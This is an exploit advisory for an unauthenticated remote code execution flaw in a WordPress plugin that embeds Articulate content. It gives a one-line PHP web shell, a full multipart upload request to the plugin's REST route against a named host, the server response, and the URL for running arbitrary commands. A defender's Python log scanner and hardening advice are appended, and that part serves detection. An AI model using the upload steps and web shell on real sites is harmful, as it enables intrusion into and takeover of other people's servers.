WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unauthorized)

2019.06.23
Con7ext (ID)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Authorized RCE : https://cxsecurity.com/issue/WLB-2019060137
# Author : Con7ext

1. Create files > index.php (or whatever) and index.html

EX: INDEX.html
<html> HELLO WORLD </html>

EX: INDEX.php
<?php system($_GET['cmd']); ?>

2. Compress them to a zip

3. Make a request to /wordpress/index.php/wp-json/articulate/v1/upload-data

POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1
Host: movie.boniw.io
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://movie.boniw.io/wordpress/wp-admin/post.php?post=16&action=edit
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 808294
Connection: close

-----------------------------57052814523281
Content-Disposition: form-data; name="name"

whatever.zip
-----------------------------57052814523281
Content-Disposition: form-data; name="chunk"

2
-----------------------------57052814523281
Content-Disposition: form-data; name="chunks"

3
-----------------------------57052814523281
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

ANY

4. You will see a message like:

{"OK": 1, "info": "Upload Complete!", "folder" : "kntl", "path" : "\/wp-content\/uploads\/articulate_uploads\/kntl\/index.html", "name" : {"file_name":"index.html","status":"index_html_file_found"}, "target": "/var/www/html/wordpress/wp-content/uploads/articulate_uploads/kntl"}

5. Then you can see site.com/PATH ( site.com/wp-content/uploads/articulate_uploads/kntl/index.php )

6. Then you can run commands ( just add ?cmd, EX: site.com/wp-content/uploads/articulate_uploads/kntl/index.php?cmd={COMMAND} )
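As an added defender-side example (not part of the advisory), the following Python check scans web-server access logs for the pattern the advisory describes: POSTs to the plugin's upload-data REST route from a client that afterwards requests a .php file under wp-content/uploads/articulate_uploads/. The log lines, IP addresses and folder names are constructed; Apache combined log format is assumed.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache combined format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jun/2019:10:00:01 +0000] "POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Jun/2019:10:00:02 +0000] "POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Jun/2019:10:00:05 +0000] "GET /wordpress/wp-content/uploads/articulate_uploads/kntl/index.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.4 - - [23/Jun/2019:10:01:00 +0000] "GET /wordpress/wp-content/uploads/articulate_uploads/course1/story.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, path and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/wp-json/articulate/v1/upload-data"   # route named in the advisory
UPLOAD_DIR = "/wp-content/uploads/articulate_uploads/"    # extraction target named in the advisory
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def analyze(log_text):
    """Per client IP: number of POSTs to the upload route and any PHP paths requested under the upload dir."""
    per_ip = defaultdict(lambda: {"uploads": 0, "php_hits": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m["ip"], m["method"], m["path"]
        route = path.split("?", 1)[0]          # drop the query string before matching
        if method == "POST" and route.endswith(UPLOAD_ENDPOINT):
            per_ip[ip]["uploads"] += 1
        elif UPLOAD_DIR in route and route.lower().endswith(PHP_SUFFIXES):
            per_ip[ip]["php_hits"].append(path)
    return per_ip


def alerts(log_text):
    """High: same client uploaded via the route and then requested PHP under the upload dir.
    Medium: any PHP request under the upload dir, which should only ever hold static course files."""
    out = []
    for ip, info in analyze(log_text).items():
        if info["php_hits"] and info["uploads"]:
            out.append((ip, "high", "upload-data POST followed by PHP request under articulate_uploads"))
        elif info["php_hits"]:
            out.append((ip, "medium", "PHP request under articulate_uploads"))
    return out


if __name__ == "__main__":
    for ip, severity, reason in alerts(SAMPLE_LOG):
        print(f"{severity.upper():6} {ip}: {reason}")
```

Because the plugin only needs to serve static HTML/JS course content from that directory, a medium alert is already actionable, and denying PHP execution under articulate_uploads at the web server removes the execution step regardless of how a file landed there.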



Copyright 2019, cxsecurity.com
